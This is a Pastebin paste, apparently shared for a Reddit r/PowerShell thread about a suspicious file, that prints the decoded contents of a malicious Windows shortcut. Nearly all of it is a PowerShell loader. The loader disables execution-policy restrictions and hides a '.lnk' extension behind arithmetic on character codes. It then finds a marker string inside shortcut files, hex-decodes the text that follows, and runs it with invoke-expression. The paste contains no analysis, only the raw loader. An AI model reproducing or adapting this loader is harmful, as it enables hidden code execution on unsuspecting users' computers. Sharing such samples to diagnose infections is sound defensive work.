Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Direct link to reddit's post
- #https://www.reddit.com/r/PowerShell/comments/pg3po1/please_help_very_suspect_file_opened_on_my_pc_no/
- "%ÝwNÁç]N·D.±®Q˜·Ý•‰1SPSâŠXF¼L8C»ü“&˜mÎm-S-1-5-21-287986104-305762756-3537409591-1001LÀFá@PàOÐê:i¢Ø+00/C:\V1WINDOWS@ï¾.WINDOWSZ1System32Bï¾.System32t1WindowsPowerShellTï¾.WindowsPowerShellN1v1.0:ï¾.v1.0l2powershell.exeNï¾.powershell.exeÄ
- Set-ExecutionPolicyUnRestricted
- function Quiet-Content($path){
- $malicious_command=$Null
- $array=@(2037,2099,2101,2098)
- $extension=$Null
- $number_to_substract=1991
- foreach($number_in_array in $array){
- $extension+=[Char]($number_in_array-$number_to_substract)
- }
- Get-ChildItem $path -Recurse -Depth1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq $extension} | % {
- $child_content=[String](Get-Content $_.FullName )
- $matching_string='TXRXMIQJ'
- $index_of_string = $child_content.IndexOf($matching_string)
- if($index_of_string -ne -1){
- $malicious_file=$child_content.SubString($index_of_string)
- $malicious_command=$malicious_file.Replace($matching_string,'')
- }
- }
- return $malicious_command
- }
- function dll_builder($malicious_command){
- $dll_builder=[Text.StringBuilder]::New()
- for($index=0 ; $index -lt $malicious_command.Length; $index+=2){
- [void]$dll_builder.Append([char][int]('0x'+$malicious_command.Substring($i,2)))
- }
- return $dll_builder.ToString()
- }
- $malicious_command = Quiet-Content $(Get-Location).Path
- if($malicious_command -eq $Null){
- $malicious_command=Quiet-Content$($env:TEMP)
- }
- invoke-expression ((dll_builder $malicious_command))
- C:\WINDOWS\System32\imageres.dll
- %SystemRoot%\System32\imageres.dll
- %SystemRoot%\System32\imageres.dll
Add Comment
Please, Sign In to add comment